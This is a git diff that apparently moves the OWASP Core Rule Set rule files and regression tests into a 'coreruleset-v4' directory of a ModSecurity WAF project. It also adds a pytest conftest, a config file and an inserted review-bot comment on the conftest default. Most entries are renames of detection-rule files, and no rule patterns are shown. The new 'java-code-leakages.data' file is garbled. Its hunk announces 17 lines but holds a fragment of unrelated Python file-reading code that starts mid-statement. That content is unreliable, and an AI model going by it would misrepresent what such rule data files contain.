diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-921-PROTOCOL-ATTACK.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-921-PROTOCOL-ATTACK.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-921-PROTOCOL-ATTACK.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-922-MULTIPART-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-922-MULTIPART-ATTACK.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-922-MULTIPART-ATTACK.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-922-MULTIPART-ATTACK.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf 
diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf 
diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-949-BLOCKING-EVALUATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-949-BLOCKING-EVALUATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-949-BLOCKING-EVALUATION.conf 
diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-950-DATA-LEAKAGES.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-950-DATA-LEAKAGES.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-950-DATA-LEAKAGES.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-950-DATA-LEAKAGES.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf 
diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-955-WEB-SHELLS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-955-WEB-SHELLS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-955-WEB-SHELLS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-955-WEB-SHELLS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-959-BLOCKING-EVALUATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-959-BLOCKING-EVALUATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-959-BLOCKING-EVALUATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-959-BLOCKING-EVALUATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-980-CORRELATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-980-CORRELATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-980-CORRELATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-980-CORRELATION.conf 
diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example diff --git a/src/common/core/modsecurity/files/coreruleset/rules/iis-errors.data b/src/common/core/modsecurity/files/coreruleset-v4/rules/iis-errors.data similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/iis-errors.data rename to src/common/core/modsecurity/files/coreruleset-v4/rules/iis-errors.data diff --git a/src/common/core/modsecurity/files/coreruleset/rules/java-classes.data b/src/common/core/modsecurity/files/coreruleset-v4/rules/java-classes.data similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/java-classes.data rename to src/common/core/modsecurity/files/coreruleset-v4/rules/java-classes.data diff --git a/src/common/core/modsecurity/files/coreruleset-v4/rules/java-code-leakages.data b/src/common/core/modsecurity/files/coreruleset-v4/rules/java-code-leakages.data new file mode 100644 index 000000000..5ec620588 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/rules/java-code-leakages.data @@ -0,0 +1,17 @@ + self.blksize: + self.f.seek(-self.blksize * self.blkcount, 2) # read from end of file + self.data = self.f.read(self.blksize).split(b'\n') + # strip the last item if it's empty... a byproduct of the last line having + # a newline at the end of it + if not self.data[-1]: + self.data.pop() 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/README.md b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/README.md
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/__init__.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/__init__.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/__init__.py
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/__init__.py
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/config.ini b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/config.ini
new file mode 100644
index 000000000..6b7c934ec
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/config.ini
@@ -0,0 +1,5 @@
+[modsec2-apache]
+log_location_linux = tests/logs/modsec2-apache/error.log
+
+[modsec3-nginx]
+log_location_linux = tests/logs/modsec3-nginx/error.log
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/conftest.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/conftest.py
new file mode 100644
index 000000000..c2e2cd975
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/conftest.py
@@ -0,0 +1,17 @@
+try:
+ import ConfigParser as configparser
+except ImportError:
+ import configparser
+import os
+import pytest
+
+
+def pytest_addoption(parser):
+ parser.addoption('--config', action='store', default='modsec2-apache')
+
+
+@pytest.fixture(scope='session')
+def config(request):
+ cp = configparser.RawConfigParser()
+ cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
+ return dict(cp.items(request.config.getoption('--config')))
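Review bot: `pytest_addoption` in conftest.py defaults `--config` to `modsec2-apache`, so a run that omits the option reads the Apache section of config.ini even though this project appears to run ModSecurity v3 under nginx; the regression checks would then look at `tests/logs/modsec2-apache/error.log` rather than the log the WAF actually writes. The value is also not validated: an unknown name reaches `cp.items()` and fails with a NoSectionError, and `cp.read()` silently reads nothing if config.ini is missing. Consider `parser.addoption('--config', action='store', default='modsec3-nginx', choices=('modsec2-apache', 'modsec3-nginx'))`. If this tree is meant to stay a verbatim copy of upstream, pass `--config modsec3-nginx` explicitly wherever the suite is invoked instead of editing the file.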
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/requirements.txt
new file mode 100644
index 000000000..3bf8a34f4
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/requirements.txt
@@ -0,0 +1 @@
+ftw==1.3.0
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml
similarity index 100%
